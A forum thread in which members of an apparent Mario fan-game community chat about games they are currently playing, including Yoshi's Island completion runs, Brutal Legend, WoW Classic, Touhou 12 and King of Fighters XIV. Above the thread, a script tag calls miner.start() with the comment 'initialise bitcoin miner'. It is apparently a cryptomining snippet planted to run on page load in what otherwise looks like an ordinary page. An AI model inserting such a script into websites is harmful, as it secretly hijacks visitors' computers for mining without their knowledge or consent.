<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Kleetus

Re: What games are you playing?

Postby Kleetus » 1 day ago

I recently finished Brutal Legend's single player mode. Major highlight of the game is when a BDSM demon lord with the voice of Tim Curry takes a break from slaughtering the armies of man by rocking out on his four necked guitar in order to deliver the "your mom" of the decade.
Reading up on the game, it's pretty disappointing to see that the developers had a lot more plans for the game but never got around to them because of time/budget constraints and low sales numbers.

BurntTenda
defeat four ducks
Pronouns: he/him/his

Postby BurntTenda » 1 day ago

I never realized how quickly you can get the Super Missiles in Super Metroid...

I also have gotten through the Forest of Illusion in SMW.
Forest of Illusion 2 might just be my least favorite level.
Something goes here sometime.

Slimeman01
Elecman D A B B B
First name: Matt

Postby Slimeman01 » 1 day ago

I'm trying to 100% Yoshi's Island right now, just finished the World 5 fortress! Doing this has been an interesting experience for me, as normally whenever I'd play through, I'd get 100% in Worlds 1-2, but then I'd miss something in world 3 and then just give up and just play through the rest of the game. Very fun with getting everything and then crying at them extra levels! (Which aren't as hard as people have made them out to be, though that might be the rewind feature talking to me)
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

Awoo
I came here to awoo at you!

Re: What games are other people playing?

Postby Awoo » 1 day ago

Slimeman01 wrote: I'm trying to 100% Yoshi's Island right now, just finished the World 5 fortress! Doing this has been an interesting experience for me, as normally whenever I'd play through, I'd get 100% in Worlds 1-2, but then I'd miss something in world 3 and then just give up and just play through the rest of the game. Very fun with getting everything and then crying at them extra levels! (Which aren't as hard as people have made them out to be, though that might be the rewind feature talking to me)
Shame that Lord Puddington is only in like what, that one level?
I always thought that Lord Puddington section was fun/neat. Wish there were more Yoshi's Island hacks
ワンワン :pal:

Ashan
The world has become a place

Postby Ashan » 1 day ago

Slimeman01 wrote: I'm trying to 100% Yoshi's Island right now, just finished the World 5 fortress! Doing this has been an interesting experience for me, as normally whenever I'd play through, I'd get 100% in Worlds 1-2, but then I'd miss something in world 3 and then just give up and just play through the rest of the game. Very fun with getting everything and then crying at them extra levels! (Which aren't as hard as people have made them out to be, though that might be the rewind feature talking to me)
Literally came to this thread to mention I'm 100%ing Yoshi's Island right now. I just finished world 2, had a lot of fun in world 2 extra (with the switch race and turbo french bread platforms) and finally got through it with all the red coins/flowers, and... Got 80 points cause I neglected the stars. You gotta go left first to a pipe where they just give them to you. Thankfully it's a lot easier once you know the level layout and I got it again on my first try!
I've never used the rewind feature cause it kinda ruins the point of... video games...

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 1 day ago

There's no shame in using emulator tools if you want to but I'm somewhat baffled at the idea of doing that and then concluding "ok these aren't hard, everyone else was just exaggerating"
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Slimeman01
Elecman D A B B B
First name: Matt

Postby Slimeman01 » 1 day ago

Leet wrote: There's no shame in using emulator tools if you want to but I'm somewhat baffled at the idea of doing that and then concluding "ok these aren't hard, everyone else was just exaggerating"
Yeah, deeeeefinetly the rewind talking to me. I still thoroughly enjoyed them extra levels though, they're super fun and unique! And once I unlock all of them, I'll go back and beat em without using it!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

Griflion
I'm gonna chomp ya!

Postby Griflion » 1 day ago

Finally started to play WoW Classic and went Deadmines yesterday with my 4 siblings...
Oh boy, do i miss some QoL stuff, but it also feels great that it isn't a piece of cake until raiding begins. Let's see if i still play it after this month.

GenesisJames
You know you got personality when you can live without a head.

Postby GenesisJames » 12 hours ago

Been working on my 1cc run of Touhou 12. I still think it's harder than 11. Most of my runs go pretty great since it's so easy to get lives, then either fall apart at Shou if I get unlucky or just crumble when I get to Byakuren (her non-spells are WAY harder than her actual spells like what the fuck). I'll get it eventually!

I also picked up King of Fighters XIV. I've only played '00,'01, '03, and XI, so this was a pretty big jump for me, but I'm really enjoying it! Much more reasonable difficulty curve compared to the Neo Geo games, and everything feels very nice to play. Whip is always my main but I'm having A LOT of fun with Blue Mary in this game. She became one of my favorite characters.

Return to “the cartridgé”